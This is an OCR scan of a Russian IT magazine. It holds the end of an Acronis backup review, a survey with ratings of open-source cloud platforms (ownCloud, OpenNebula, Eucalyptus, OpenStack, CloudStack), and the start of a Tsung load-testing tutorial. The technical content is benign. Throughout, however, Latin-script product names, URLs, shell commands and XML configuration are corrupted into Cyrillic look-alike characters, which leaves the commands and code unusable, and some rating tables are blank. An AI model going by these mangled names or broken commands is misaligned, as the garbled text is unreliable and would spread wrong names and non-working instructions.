технология теневого копирования ѴѴіпсІоѵѵз Ѵ55 (Ѵоіите ЗЬасІоѵѵ 
Сору Зегѵісе). Для хранения предлагается собственное онлайно- 
вое хранилище Асгопіз Васкир & Ресоѵегу Опііпе, которое можно 
использовать как вместе с решением от Асгопіз, так и отдельно. 
Данные в таком хранилище доступны из любой точки, что позволя- 
ет защититься от форс-мажорных обстоятельств вроде стихийного 
бедствия или кражи техники. Для уменьшения трафика можно 
заполнить хранилище полной копией один раз, а в последующем 
отправлять только измененные данные. 

При бэкапе данных с виртуальных машин можно установить 
агент и контролировать его работу точно так же, как при работе 
с физическим сервером. Для ѴМѵѵаге ѵЗрЬеге или М5 Нурег-Ѵ воз- 
можно использование единого агента для хост-машины, позволяю- 
щего контролировать сразу все ѴМ. 

Снимки позволяют быстро восстановить работоспособность 
ОС на подобном или отличающемся железе, в последнем случае 
понадобится Асгопіз ІІпіѵегзаІ Резіоге. Его функции схожи с АІЮ 
и позволяют легко перенести сервер на другое оборудование 
в ходе модернизации, выполнить Р2Ѵ-, Ѵ2Р- и Ѵ2Ѵ-миграцию или 
клонировать ОС. В том числе поддерживается автоматическая 
смена идентификатора безопасности ѴѴіпсІоѵѵз 5Ю (Зесигііу Ю). 

Если компьютер не запускается из-за краха ОС или разруши- 
тельного действия вирусов, работоспособность ОС можно восста- 
новить из загрузочного меню или с помощью специального диска. 

Как и положено программе бэкапа, поддерживается полное, 
инкрементное и дифференциальное копирование, что позволяет 
уменьшить размер сохраняемых данных. Алгоритм инкрементного 
бэкапа использует данные ІМТР5, а не пересканирует весь диск, 
поэтому нужные файлы находятся быстро и такая копия создается 
в кратчайшие сроки. 

Поддерживается х86/х64 ОС ѴѴіпсІоѵѵз, начиная от 2к5Р4, и фай- 
ловые системы РАТ16/32, ІМТР5. Версия для І_іпих будет работать 
на любых дистрибутивах І_іпих 2.4.20+ и дІіЬс версии не ниже 2.3.2. 
Официально поддерживаются РРІЕІ_/СепЮ5, Ресіога, 5І_Е5, ІІЬипІи, 
йеЫап и файловые системы ехі2/3/4, РеізегРБ, ХР5 и 6Р5. Стоит 
отметить, что при использовании последних трех ФС нельзя вос- 
станавливать отдельные файлы. 

Для небольших групп компьютеров предназначены версии 
АВР, не имеющие централизованного управления, задания при 
этом устанавливаются локально. Для больших организаций 
следует выбирать вариант с приставкой Абѵапсеб. Лицензи- 
руется АВР по количеству компьютеров, но для Ѵігіиаі ЕбШоп 
возможно неограниченное число миграций Р2Ѵ, Ѵ2Р или Ѵ2Ѵ на 
хост-машину и обратно. Ш-И 
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Сергей Яремчук (дгіпсІегѲзупаск.ги) 
Мартин Пранкевич (тагііпйзупаск.ги) 
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ОРЕЫ 501 ІРСЕ РЕШЕНИЯ ДЛЯ ОРГАНИЗАЦИИ 
5 АА 5 /ІАА 5 , СПОСОБНЫЕ ИЗМЕНИТЬ ИНФОРМАЦИОННЫЕ 
ТЕХНОЛОГИИ И ТО, КАК МЫ ИХ ВОСПРИНИМАЕМ 



Благодаря таким преимуществам, как относительная доступность, гибкость и экономия ресурсов, 
облачные вычисления стали одним из главных ІТ-трендов этого года. Многие организации уже 
задумались над тем, чтобы внедрить облачные решения и продукты виртуализации в свои инфра- 
структуры. Надеемся, данный обзор поможет определиться с выбором. 
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Грозовые облака 



ошаоію 



Разработчик: оѵѵпСІоисІ Іпс. 
Сайт проекта: оѵѵпсіоисі.огд 

Лицензия: 6ІМІІА6РІ_ 



Один из самых известных опенсорсных проектов, предназначен- 
ных для организации работы сіоиб-хранилища. По функционалу 
напоминает сервисы йгорЬох, Ьох.пеі, Ооодіе йосз и ІІЬипІи Опе, но 
отличается возможностью полного контроля надданными. Изна- 
чально развивался сообществом КйЕ, но впоследствии основатели 
проекта создали коммерческую компанию оѵѵпСІоисІ Іпс., в задачи 
которой входит предоставление сервисов на базе оѵѵпСІоисІ и плат- 
ная поддержка. В будущем планируется продавать и готовый сер- 
вер с предустановленным оѵѵпСІоисІ. Продукт быстро развивается, 
новый релиз с еще большими возможностями выходит каждые три 
месяца. Для доступа к данным используется обычный веб-браузер 
или протокол ѴѴеЮАѴ, который поддерживается во всех современ- 
ных ОС и позволяет настроить доступ к хранилищу как к сетевому 
диску, облегчая загрузку, изменение и сохранение данных любых 
типов. Также недавно появился специальный клиент оѵѵпСІоисІ 
5упс СІіепС предоставляющий возможность синхронизировать 
данные с настольной системой, которая работает под управлением 
І_іпих, ѴѴіпсІоѵѵз или Мае 05 X. 

Начиная с версии 3, в состав оѵѵпСІоисІ входит онлайн-редактор, 
позволяющий редактировать текстовые файлы (в том числе ис- 
ходные тексты программ) прямо в браузере. Поддерживается про- 
смотр РОР- и ООР-файлов, календарь, закладки, адресная книга, 
интерфейс для ведения списка дел ТСЮО, контроль версий файлов, 
шифрование, проигрывание музыкальных файлов. Те, кто имеет 
доступ, могут просмотреть рисунки в фотогалерее пользователя. 
Возможна синхронизация файлов и календаря, адресной книги 
с мобильным устройством или настольным приложением, а также 
с другими подобными системами, поддерживающими протокол 
гетоІеЗіогаде. 

Пользователь самостоятельно указывает, кто может прочитать 
сохраненные им файлы. Доступ к файлам и каталогам может быть 
предоставлен для зарегистрированных пользователей и групп 
оѵѵпСІоисІ (после открытия доступа они увидят их в меню «Файлы — > 
БЬагесІ») или в виде прямой ссылки, генерируемой пользователем 
(не требует регистрации). Реализован удобный поиск по данным, 
есть возможность установки квот и ограничений на максималь- 
ный размер файлов. Поддержка Ореп СоІІаЬогаІіоп Зегѵісез АРІ 
позволяет отправлять сообщения другим пользователям через 
стандартный механизм нотификации КОЕ. Поддерживается работа 
со службами ОрепЮ и ЮАР. 

Правда, комфортная работа с оѵѵпСІоисІ гарантируется только 
при использовании последних версий Рігеіюх, СЬготе и Орега, 
с некоторыми версиями ІЕ навигация может быть затруднена. 

Также возможны проблемы с отображением данных на некоторых 
планшетах. В интернете для оѵѵпСІоисІ можно найти большое коли- 
чество расширений и приложений Арр 5іоге, позволяющих сделать 
работу с оѵѵпСІоисІ еще более удобной (например, плагин для 
совместного поддержания фотоальбома; музыкальный сервер, по- 
зволяющий прослушивать собственную музыкальную коллекцию 
с любого устройства в сети; хранилище подкастов и видеороликов 
с доступом через веб-интерфейс или через медиаплеер). 

Интерфейс системы переведен на многие языки, в том числе 
и русский. Освоить интерфейс без больших затруднений сможет 
пользователь с любым уровнем подготовки. 

Система написана на РНР (для установки и работы требуют- 
ся модули р Ь р 5 - ) 5 о п , рЬр-хтІ, рЬр-тЬзІгіпд, рИрб- 2 Ір, рЬрб-дсІ), 
в качестве СУБД может быть использована 50І_іІе, РозІдгеЗСИ 
или Му5С11_. По сути, для развертывания требуется стандартный 
І_АМР- или ѴѴАМР-сервер. Чтобы установить лимиты на выделяе- 
мую память, загрузку и размер файлов, в конфиге рЬр.іпі следует 
изменить значения директив тетогу_ІітіІ, ро5І_тах_5І2е и тах_ 




Для доступа к данным оѵѵпСІоисІ используется обычный веб-браузер 



ЛІе_ирІоасІ5 в большую сторону (в случае ІІЬипІи/ОеЬіап рбр.іпі 
находится в каталоге Мс/рЬр5/арасЬе2). Возможно использование 
защищенного НТТР5-соединения, для этого необходимо лишь 
сгенерировать сертификат сервера. 



Функциональность 9/10 

Производительность 8/10 

Простота использования 10/10 

Безопасность 9/10 

Масштабируемость 8/10 



ОРЕММЕВІЛА 



Разработчик: ОрепМеЬиІа/С1 26 1_аЬз 
Сайт проекта: ореппеЬиІа.огд 

Лицензия: АрасЬе Ысепзе 



Платформа, предназначенная для организации управления вир- 
туализацией центра обработки данных. Позволяет поднять Іаа5 
(инфраструктура как сервис), похожую на Атагоп ЕС2, но полно- 
стью подчиненную админу. В отличие от других подобных проектов, 
разработчики своей целью ставят возможность реализовать весь 
потенциал, заложенный в облачной концепции, а не просто создать 




Пользователь может редактировать текстовые файлы, 
хранящиеся в оѵѵпСІоисІ, прямо в окне браузера 
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5УЫ/АСК 



удобное средство управления гипервизором. Открытая архитектура 
позволяет подключить ОрепІМеЬиІа к любой платформе или менед- 
жеру управления виртуализацией. Поддерживаются интерфейсы 
управления к РиЫіс СІоисІз и гибридные облака, позволяющие 
объединять местную инфраструктуру и публичные облака, что дает 
возможность легко масштабировать среду в случае необходимости 
(например, при нехватке ресурсов). Соответственно, можно также 
динамично добавлять и исключать собственные виртуальные сер- 
веры, добиваясь нужного уровня производительности сервиса. При 
этом облачную среду могут использовать несколько организаций 
или можно просто сдавать ресурсы в аренду с делегированием пол- 
номочий и настройкой квот. Для удобного управления виртуальными 
ресурсами и учетными записями используется несколько уровней 
абстракции. Так, физические серверы объединяются в кластеры, 
а установки ОрепІМеЬиІа — в зоны (о2опез). Кроме того, используется 
концепция групп, каждая из которых может иметь индивидуаль- 
ные установки и набор доступных ресурсов, не пересекающихся 
с остальными. Присутствует возможность задания одной из четырех 
политик размещения ресурсов в дата-центре Юаіа Сепіег РІасетеп* * 
Роіісіез). Например, при выборе раскіпд будет использовано мини- 
мальное число серверов для размещения ѴМ. 

Для управления элементами физической и виртуальной ин- 
фраструктуры используются утилиты командной строки (опеѵт, 
опеЬозІ, опеизег, опеітаде и так далее) и несколько веб-консолей. 
На конечных пользователей ориентирован ЗеІІ'-Зегѵісе Рогіаі, 
администрирование сіоиб-окружений выполняется при помощи 
ОрепІМеЬиІа 5ипз*опе, для управления несколькими зонами одного 
пользователя служит ОрепІМеЬиІа 2опез. 

Консоли включают средства для развертывания виртуаль- 
ных окружений, управления образами и сетями, мониторинга 
(интегрирована система (Запдііа), контроля доступа, обеспечения 
безопасности и управления хранилищем. Менеджер виртуальных 
сетей позволяет абстрагироваться от физической сети, управлять 
виртуальными средами и изолировать некоторые из них. 

Физические узлы кластера в настоящее время могут использовать 
Хеп, КѴМ и ѴМѵѵаге, кроме того, обеспечивается дополнительная под- 
держка Нурег-Ѵ, 0репѴ2, ѴИиаІВох. Реализован интерфейс к Атагоп 



СІ_ОУО РОУМКУ 



СІоисі Роипсігу І сІоисИоипсІгѵ.огд ) представляет собой открытый 
РааБ-сервис (РІаНогт аз а зегѵісе), позволяющий разработчикам 
тестировать свои приложения на множестве фреймворков и языков 
программирования: РНР, Ру*Иоп, .МЕТ, Бргіпд Заѵа, Раііз и 5іпа*га 

*ог РиЬу, ІЧосіедз, Сгооѵу, бгаііз, которые могут взаимодействовать 
с различными СУБД (Му5СІІ_, Ро5*дгеБСІІ_, МопдоБВ, ГСесІіз, ГСаЬЬіМСІ, 
Мео4Д Фактически пользователю предоставляется уже готовый 
набор различных сред, который не нужно разворачивать, достаточ- 
но лишь загрузить написанную программу. Развитием СІоисі Роипсігу 
занимается ѴМѵѵаге, исходный код под лицензией АрасИе опубли- 
кован на СіЖиЬ, и, по сути, это первый Ореп Боигсе РааБ-проект 
промышленного уровня. В настоящее время несколько хостеров уже 
предлагают сервис, основанный на СІоисі Роипсігу. При необходи- 
мости можно развернуть соответствующую среду самостоятельно. 

В ІІЬипіи для этого достаточно использовать .^и или подключить 
репозиторий рраісіоисіі'оипсі гу/рра, в котором уже есть готовые 
пакеты. В поставке СІоисі Роипсігу имеется несколько тестовых при- 
ложений, которые можно запустить для проверки работоспособно- 
сти. Также можно использовать специальный дистрибутив 5*аска*о 
( асііѵезіаіе.сот/Біаскаіо ). 

Основным конкурентом СІоисі Рои псі гу является РааБ-платформа 
ОрепБЫН ( Шр5://орепзЫН.гесіИа{.сопп/арр ), открытая в апреле 2012 
года компанией Ресі На*. 



ЕС2, поддерживается АРІ — ЕС2 Оиегу, ОСЕ ОССІ и ѵСІоиб. Хранилище 
образов дисков поддерживает 5АІ\І и ІМА5, для доступа к ним с любого 
узла кластера посредством Тгапзіюг Мападег можно использовать 
протокол І\ІР5, 5РТР, НТТР или их комбинацию. Для хранения параме- 
тров ОрепІМеЬиІа устанавливается Му5СИ_ или 5СИ_і*е. 

Развитие ОрепІМеЬиІа финансируется несколькими спонсорами, 
в этом списке можно найти как государственные, так и коммерче- 
ские организации. Среди тех, кто использует ОрепІМеЬиІа: СЕРЫ, 
РегтіІ_аЬ, СЫпа МоЬіІе, Европейское космическое агентство и дру- 
гие. Проект предлагает готовые пакеты для установки на ІІЬип*и, 
йеЫап, орепБІІБЕ и РНЕІ_/СепШ5. Также следует отметить весьма 
подробную документацию проекта (на английском). 



Функциональность 




10/10 


Производительность 




9/10 


Простота использования 




9/10 


Безопасность 


ИЯИЯДЯЯ 


9/10 


Масштабируемость 




9/10 



ЕІІСАІ-ѴРТІІ5 




Разработчик: ЕисаІурІизБузІетз, Іпс. 
Сайт проекта: ѵѵѵт.еисаіѵріиз.сот 

Лицензия: 0МІІ0РІ_ 



Программная платформа для реализации частных и гибридных об- 
лаков (ІааБ), экспортирует интерфейс, совместимый с Атагоп ЕС2 
(Атагоп ѴѴеЬ Бегѵісез АРІ) и 53. Проект начат как исследователь- 
ский в недрах ІІпіѵегзііу о* СаІііюгпіа, 5ап*а ВагЬага и стал одной 
из первых разработок, предлагающих комплексную архитектуру 
управления ІааБ. С 2009 года его развитием и коммерческой под- 
держкой занимается Еисаіуріиз Бузіетз, Іпс. Некоторое время 
предлагались два издания: ОрепСоге Еп*егргізе Есііііоп и Ореп 
Боигсе. С лета 2012-го развивается единая Ореп Боигсе версия 
(вероятно, к этому решению разработчиков подтолкнуло стре- 
мительное развитие 0реп5*аск и СІоисІ5*аск). Сегодня ЕисаІурІиз 
используют в Министерстве обороны США и ІМА5А, а также многие 
именитые компании, например Бопу, Іпіюзуз, Аегозрасе, Рщі Рііт. 

Заявлена поддержка таких технологий виртуализации, как Хеп, 
КѴМ и ѴМѵѵаге. Несколько кластеров можно связать в единое об- 
лако. Реализованы настраиваемые политики уровня обслуживания 
и доступа, возможность управления ІР, учетными записями пользо- 




Интерфейс ОрепЫеЬиІа Зипзіопе 
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Грозовые облака 



вателей и групп, подсистема отчетов. Кроме стандартного способа 
получения ІР для гостевых ОС (йНСР, статический), администратор 
может создавать подсети с определенными правилами. 

Платформа состоит из пяти основных компонентов, организо- 
ванных в виде отдельной службы и имеющих свой веб-интерфейс: 
СІоиб СопІгоІІег, Сіизіег СопІгоІІег, ѴѴаІгиз, Біогаде СопІгоІІег и ІЧобе 
СопІгоІІег. Также предоставляется набор инструментов командной 
строки еиса2ооІз, который может быть использован для управле- 
ния Еисаіуріиз и другими сервисами, совместимыми с АѴѴ5 АРІ. Для 
безопасной связи между внутренними процессами используется 
протокол 50АР и его расширение ѴѴБ-Бесигііу. 

Развертывание облака при помощи Еисаіуріиз не всегда происхо- 
дит гладко и требует обращения к документации по многим вопросам. 
В первую очередь следует обратить внимание на два руководства: 
Абтіпізігаіог'з и ІІзег'з Сиібе. Разработчики предлагают репозито- 
рии и пакеты для большинства популярных дистрибутивов І_іпих — 
ІІЬипІи, йеЬіап, 5І_Е5/ореп51І5Е, РНЕІ_/СепЮ5 и Ребога. 



Функциональность 9/10 

Производительность 8/10 

Простота использования 7/10 

Безопасность 9/10 

Масштабируемость 9/10 



0РЕЫ5ТАСК 

Разработчик: ОрепБІаскРоипсІаІіоп 
Сайт проекта: орепвіаск.ого 

Лицензия: АрасЬе Ысепзе 

Проект возник в июле 2010 года в результате слияния двух про- 
ектов, разрабатываемых Раскзрасе Нозііпд (Раскзрасе СІоиб Рііез) 
и ІЧА5А (ІЧеЬиІа). Основная задача — предоставить всем желающим 
возможность создать свое собственное облако без каких-либо 
ограничений. Проект развивается весьма активно, новые версии 
выходят по мере готовности без какого-либо стабильного цикла 
выпуска релизов. Каждый релиз получает свое имя, начинающееся 
со следующей буквы алфавита (Аизііп, Вехаг, Сасіиз...). Сегодня 
к разработке ОрепБіаск присоединилось более 150 компаний, сре- 
ди которых такие гиганты, как Сізсо, НР, йеІІ, АМй, Іпіеі и ІЧЕС. До 
недавнего времени в этом списке была и Сіігіх, но она перестала 
поддерживать ОрепБіаск в интересах своего СІоибБіаск. В версии 
11.10 (Опеігіс Осеіоі) для построения облачной платформы ІІЬипІи 
более простой в настройках и неограниченный в возможностях 
ОрепБіаск заменил использовавшийся до этого Еисаіуріиз. 

ОрепБіаск изначально имеет модульную структуру, вклю- 
чающую три основных компонента (каждый может состоять из 
нескольких сервисов): 

• Моѵа — контроллервычислительныхресурсов (основа ІааБ); 

• БѵѵіК — масштабируемая система хранения данных; 

• ОІапсе — сервис поиска и хранения образов виртуальных машин, 
с поддержкой обновления объектов, репликацией, обеспечением 
целостности и возможностью предоставления статистики. 

Впоследствии к ним добавился сервис идентификации, 
аутентификации и политик (Кеузіопе), а также модульное О)апдо- 
веб-приложение, предоставляющее конечному пользователю 
интерфейс администратора для управления сервисами — ОрепБіаск 
ОазЬЬоагб (Ногігоп). С версии Еззех в ОрепБіаск используется 
сетевая подсистема Оиапішп, позволяющая создаватьсетевые 
топологии любой сложности с поддержкой политик. Поддержка 
в (Эііапішп плагинов и открытый АРІ дают возможность в будущем 
добавить любые функции (например, бгеѵѵаІІ, Ю5/ІР5, балансировку 




Управление сервисами в окне ОрепБІаск Ногіюп 

нагрузки, ѴРІ\І). В настоящее время доступно несколько плагинов, 
обеспечивающихподключение: Ореп ѵБѵѵіісЬ, Сізсо ІІСБ/ІЧехиз, 

І_іпих Вгісіде, N ісіга ІМеІѵѵогкѴИиаІігаІіоп РІаЧюгт и Руи 0 реп РІоѵѵ 
СопІгоІІегРІидіп. 

В качестве технологий виртуализации могут выступать КѴМ, 

II МЦ ХепБегѵег/ХСР, ѴМѵѵаге, І_ХС и (ЭЕМІІ. Поддерживается І_іѵе 
Мідгаііоп, квоты на ресурсы, шаблоны, ролевая модель доступа 
РВАС, подключаемые диски и многое другое. По умолчанию в Ыоѵа 
доступно пять преднастроек ѴМ (Паѵог Іуре), в которых описывает- 
ся количество СРІІ, размер ОЗУ и жесткого диска, при необходимо- 
сти можно создавать свои флаворы. Более высокой организацион- 
ной структурой являются проекты, включающие в себя отдельные 
подсети, хранилища, образы, ключи и учетные записи. 

Доступны репозитории для ІІЬипІи, йеЫап, РНЕІ_/СепШ5 
и Ребога, ореп51І5Е/5І_Е5. В остальных ОС развертывание можно 
произвести при помощи исходных текстов. Для быстрого созда- 
ния ОрепБіаск-облаков на виртуальных машинах или физическом 
оборудовании можно использовать скрипт ОеѵБіаск ( беѵзіаск.огс ). 
Чтобы установить ОрепБІаск в ІІЬипІи 11.10/12.04 или Ребога 16, до- 
статочно скачать и выполнить скрипт зіаск.зб (по ссылке беѵзіаск. 
ога/з1аск.зІі.І"і1тІ можно найти хорошее описание его работы). 

$ §І1: сіопе §і1:://§і1:ІіиЬ. сот/орепз1:аск-беѵ/беѵ5І:аск.§і1: 

$ сб беѵз1:аск; ./зѣаск.зіі 

Развернуть ОрепБІаск на нескольких серверах можно при помощи 
Рирреі (инструкции можно найти по адресу доо.дІ/І_кРЫ . СгоѵѵЬаг 
или СЬеС Разработчики дистрибутива БіаскОрз ( зіаскорз.огд ) пред- 
лагают готовую сборку на базе ІІЬипІи, позволяющую быстро раз- 
вернуть нужное количество серверов ОрепБІаск. Правда, текущая 
стабильная версия 0.3 использует ОіаЫо, поэтому лучше взять пока 
тестовую 0.5 с более свежей версией ОрепБІаск. Проекттакже 
предлагает готовые образы ѴМ для запуска на КѴМ. 

Также протестировать свои приложения в ОрепБІаск можно, 
обратившись в бесплатный сервис ТгуБіаск ( ігузіаск.огд ). под- 
держиваемый Сізсо, йеІІ, Ециіпіх, НР, ІЧТТ и Раскзрасе. В России 
поддержкой ОрепБІаск занимается Риззіап ОрепБІаск Соттипііу, на 
страничках сайта орепзіаск.ги доступна информация по продукту, 
хорошо дополняющая официальные доки ( босз.орепзіаск.огд 
и ѵѵікі.орепзіаск.огд ). 

Кроме Ногігоп, для управления ОрепБІаск используются ко- 
мандные утилиты (поѵа, поѵа-тападе и прочие), которые поддер- 
живают все доступные функции и стандартные клиенты, совмести- 
мые с Атагоп ЕС2 (еиса-іооіз). 



Функциональность 9/10 

Производительность 8/10 

Простота использования 8/10 

Безопасность 8/10 

Масштабируемость 9/10 
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Мастер развертывания ОрепБІаск в дистрибутиве ЗІаскОрз 



Интерфейс управления СІоисІБІаск прост, понятен и функционален 



СКШБТАСК 



Разработчик: СіІгіхБузІетз/АрасІіеРоипсІаІіоп 

Сайт проекта: сіоисізіаск.огд, 5^.пе1:/рго]'ес1:5/сІоисІ5І:аск 

Лицензия: АрасЬе Ысепзе 

Система для организации Іаа5, которая подойдет как для не- 
большой группы виртуальных окружений на нескольких маши- 
нах, так и для построения сіоиб-систем уровня дата-центра или 
предприятия. В качестве систем виртуализации используются 
Огасіе ѴМ (ѴИиаІВох), КѴМ, ОѴМ, ѴМѵѵаге ѵЗрбеге и ХепЗегѵег, 
которые можно использовать параллельно. Клиент самостоя- 
тельно выбирает, какой гипервизор ему больше подходит для 
конкретного сервера. 

Начало разработок датировано 2010 годом, у истоков стояла 
компания ѴМОрз (под руководством Шэна Лиана (5Ьепд Ыапд), соз- 
дателя виртуальной машины ОѴМ), затем проект был переименован 
в СІоисІ.сот. Практически весь код распространялся под лицензи- 
ей 6І\Ш 6РІ_, закрытой оставалась лишь небольшая его часть, от- 
вечавшая за поддержку коммерческих систем Сізсо и ЕМС. В июле 
2011-го СІоисІ.сот приобрела Сіігіх, и код, вопреки всем опасениям, 
был опубликован под СІМІІ 6РІ_ѵЗ. В настоящее время разработки 
передаются в АрасЬе РоипбаЛоп, а лицензия изменена на АрасЬе 
Ысепзе. Параллельно Сіігіх перестала поддерживать ОрепЗіаск 
в пользу более зрелого СІоисІЗіаск. 

Используя СІоисІЗіаск, можно построить на своем оборудова- 
нии структуру, аналогичную Атагоп ЕС2, с гибкими возможно- 
стями управления всеми доступными ресурсами (виртуальными 
серверами, сетями и системами хранения данных) публичного 
и приватного облака из единой консоли. В простейшем случае 
инфраструктура состоит из одного управляющего сервера и на- 
бора вычислительных узлов, на которых организуется выполне- 
ние гостевых ОС в режиме виртуализации. Один сервер может 
управлять десятками тысяч территориально удаленных серверов. 
Хотя в сложных системах возможно использование кластера из 
нескольких управляющих серверов и балансировщиков нагрузки, 
а сама инфраструктура может быть разбита на сегменты (в так 
называемые гопез), функционирующие в отдельном дата-центре. 
Поддерживается полная изоляция ресурсов, их автоматическое 
выделение и ограничение, из других возможностей стоит отметить: 
мониторинг в реальном времени, подсистему отчетов, средства 
для создания снапшотов и резервного копирования, автоматиче- 
ское восстановление виртуальных машин после сбоя сервера. 

Управление возможно через понятный даже новичку веб- 
интерфейс (Сіігіх всегда славилась своими удобными интерфейса- 



ми), СИ или СІоисІБіаск АРІ. В дополнение к своему собственному 
АРІ СІоисІБіаск поддерживает Атагоп ЕС2 АРІ (через отдельный 
модуль СІоибВгібде), 53 АРІ и ѵСІоиб АРІ. Многие вопросы автома- 
тизированы, и большинство операций выполняются буквально од- 
ним щелчком мышки. Администратор может очень легко выделить 
квоты, создать новую ѴМ из шаблона, перераспределить ресурсы, 
в том числе подключив публичное облако. Пользователь также 
управляет своими ѴМ в пределах выделенных ему ресурсов. 

Результатом сотрудничества с ОрепЗіаск стала поддержка 
5ѵѵіЙ в СІоисІБіаск 3.0, вышедшем в начале 2012 года. Также 
в этой версии реализована инфраструктура І\1аа5 (ІМеІѵѵогкіпд 
аз а Зегѵісе), а СІоисІБіаск полностью интегрируется с Сіігіх 
ІМеіЗсаІег 50Х/ѴРХ, обеспечивая повышенную безопасность 
и производительность сети. 

Для установки предлагаются исходные тексты и бинарные сборки 
для ІІЬипІи 10.04 и РНЕІ_/СепШ5 6.2. Также на гРаіЬ можно найти 
готовую сборку с СІоисІБіаск ( граіЬ.сот/зоІиііопз/сІоисІзІаск.рЬр ). 

Документация весьма подробная и хорошо структурирована, 
а потому помогает без проблем пройти все этапы развертывания 
ІааБ на базе СІоисІБіаск. 



Функциональность 
Производительность 
Простота использования 
Безопасность 
Масштабируемость 




вывод 



Приятно осознавать, что сегодня доступны качественные и бес- 
платные продукты, которые обладают всеми необходимыми для 
создания своего собственного облака функциями. ЗС 



ИСПОЛЬЗУЯ СЬОООБТАСК, 
МОЖНО ПОСТРОИТЬ НА СВОЕМ 
ОБОРУДОВАНИИ СТРУКТУРУ, 
АНАЛОГИЧНУЮ АМА20Ы ЕС2 
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Т51ІЫ6: РАСПРЕДЕЛЕННАЯ СИСТЕМА НАГРУЗОЧНОГО 
ТЕСТИРОВАНИЯ ВЕБ-ПРИЛОЖЕНИЙ 



Іітту таІИетаІісиз (зЬтиЫопЙдтаіІ.сот) 



Ку з н и ца 
стресс-тесто в 
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На сегодняшний день существует множество 
инструментов для проведения нагрузочного 
тестирования, но ни один из них не впечатлил 
меня так, как Тзипд. Это мощное и гибкое реше- 
ние, которое позволяет имитировать большую 
нагрузку, используя минимум ресурсов. 



ПРЕИМУЩЕСТВА Т511М6 



Разработка Тзипд была начата в 2000 году Николя Никлосом (ІЧісоІаз 
ІЧісІаиззе). Сперва это была распределенная система для нагрузоч- 
ного тестирования ОаЬЬег'а, предназначенная для внутренних нужд 
компании ЮЕАІ.Х (ныне ОрепТгизі). Через несколько месяцев проект 
развился в опенсорсный мультипротокольный инструмент нагрузоч- 
ного тестирования. Сегодня Тзипд с полным правом можно причис- 
лить к одним из лучших решений в своей области. Утилита подходит 
для тестирования многих видов клиент-серверных приложений на 
базе НТТР, 50АР, ѴѴеЮАѴ, ІаЬЬег/ХМРР, ЮАР, Му5С!І_ и Роз*дгеБСП_. 
Благодаря модели легковесных процессов, заложенной в языке 
Егіапд, на котором написан Тзипд, возможно создание более 50 000 
конкурентных запросов в секунду с одного компьютера. Для большей 
реалистичности каждый из виртуальных пользователей может 
«ходить» по сайту по индивидуальному сценарию и иметь личные 
параметры. Нагрузочный сценарий может быть разбит на фазы, на- 
пример для плавного повышения нагрузки либо имитации кратковре- 
менных пиков нагрузки. При проведении теста можно задействовать 
дополнительные мониторы (агент мониторинга Егіапд, 5ІЧМР, Мипіп), 
позволяющие контролировать параметры системы, на которой рабо- 
тает веб-сервер. Организовано журналирование результатов теста 
и разнообразная визуализация результатов (графики, диаграммы, 
таблицы и прочее). 



УСТАНОВКА 



Первым делом устанавливаем пакет егіапд и зависимости: 

$ зисіо ар1=-§е1= іпзііаіі ег1ап§ 

$ зисіо ар1=-^е1= іпзііаіі ^пир1о1=-пох 1іЫ=етр1а1=е-рег1 \ 
ІіЫіІітІ-ІіетрІаІі е - р егі ІіЫіІітІ-ІіетрІаІіе - ехрг-регі 

Затем скачиваем последнюю версию утилиты, выполняем сбор- 
ку и создаем конфигурационный файл Ізипд.хтІ в поддиректории 
Тзипд домашнего каталога: 



ПОДДЕРЖКА ПРОТОКОЛОВ 



НТТР: 

1. Запросы 6ЕТ, Р05Т, РЫТ, ОЕЬЕТЕ, НЕАО. 

2. Автоматическое управлениесоокіе5. 

3. Поддержка 6ЕТІ1-Мосіі1іесі-5іпсе. 

4. Режим прокси для записи сессий с помощью браузера. 

5. Поддержка БОАР с помощью НТТР-запросов (заголовки 
БОАРАсІіоп обрабатываются). 

^ЬЬег/ХМРР: 

1. Сообщения об аутентификации, регистрации и присутствии. 

2. Чат сообщения для онлайн- и офлайн-пользователей. 

3. Розіег- и 6ЕТ-запросы. 

4. Многопользовательский чат: подключение к гоот'у, сообщения 
вгоот'е, смена ника. 

5. Запросысинхронизации пользователей. 





Количество подключенных пользователей и количество ответов сервера в секунду 



$ іл/§е1і Ііі1ір://1і5ип2.ег1ап§-ргодесі5.ог§/сІІ5Іі/1і5ип§-1 
.4. 2. Таг . ^ 2 

$ Таг - 2 ХѴ-Р Тзип§-1.4.2.і:аг.§2 
$ ./сопб§иге && таке 
$ зисіо таке іпзііаіі 

$ тксііг ~/.1і5ип^; ІіоисИ ~/.1=5ип^/1:5ип^.хт1 



НАСТРОЙКА 



Вся конфигурация Тзипд хранится в одном ХМІ_-файле, который 
имеет следующую структуру: 

<?хт1 ѵегзіоп="1.0"?> 

<Тзип§ 1о§1еѵе1="іп1 : о" сІитр1іга-Рбс="1 : аІ5е"> 

</Тзип§> 

С параметром ІодІеѵеІ, думаю, многие встречались, традиционно 
он определяетуровеньжурналирования. Параметр битрІгаІТіс ис- 
пользуется для отладки сценария: если он включен (сІитрІгаІТіс=Ігие), 
то создается дополнительный лог, в который записываются полные 
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ответы от сервера, после отладки его следует отключить. Также 
сІшпрІгаіТіс может принимать дополнительные значения для сокра- 
щенного логирования трафика: ІідЫ — записывает только первые 44 
Кб ответа и ргоіосоі — записываеттолько параметры запроса и ІІРІ_. 

Немаловажной особенностью Тзипд является возможность кон- 
фигурации кластера из клиентских машин. Можно использовать 
несколько виртуальных ІР с одной машины, это крайне полезно 
в случае, если Іоасі -Ьаіапсег на сервере использует ІР клиента для 
распределения трафика между кластером серверов. 

Даже если Егіапд ѴМ теперь способна справляться с несколькими 
СРІІ (Егіапд 5МР), тесты показывают, что для клиентов Тзипд более 
эффективно использовать одну ѴМ на СРІІ (с отключенным 5МР). Од- 
нако значение параметра СРІІ должно быть равным количеству ядер 
твоих нод. Если ты предпочитаешь использовать Егіапд 5МР, добавь 
опцию '-з' при старте Тзипд (и не задавай СРІІ в файле конфигурации). 

<с1іеп1і5> 

<с1іеп1: Ьо5'1:= ,, '1:е5'1:1 " мел.^^"!" тахи5епз="8000"> 

<ір ѵа1ие="10.0.2. 3'7_> 

<ір ѵа1ие="10.0.2.4"/> 

</с!іеп1=> 

<с1іеп1: Іі05І:="1:е5І:2" меі§1і1:="3" тахизеп5="2500Ѳ" 
сри="2"> 

<ір ѵа1ие="10.1.2.5"/_> 

<Ус1іеп1:> 

</с1іеп1=5> 

<зегѵегз> 

<зепѵеп Моз1=="10.2.2.10" ропіі="8081" 1:уре="1:ср"/> 
</зегѵегз> 



ПЛАТНЫЕ ИНСТРУМЕНТЫ 
ДЛЯ НАГРУЗОЧНОГО 
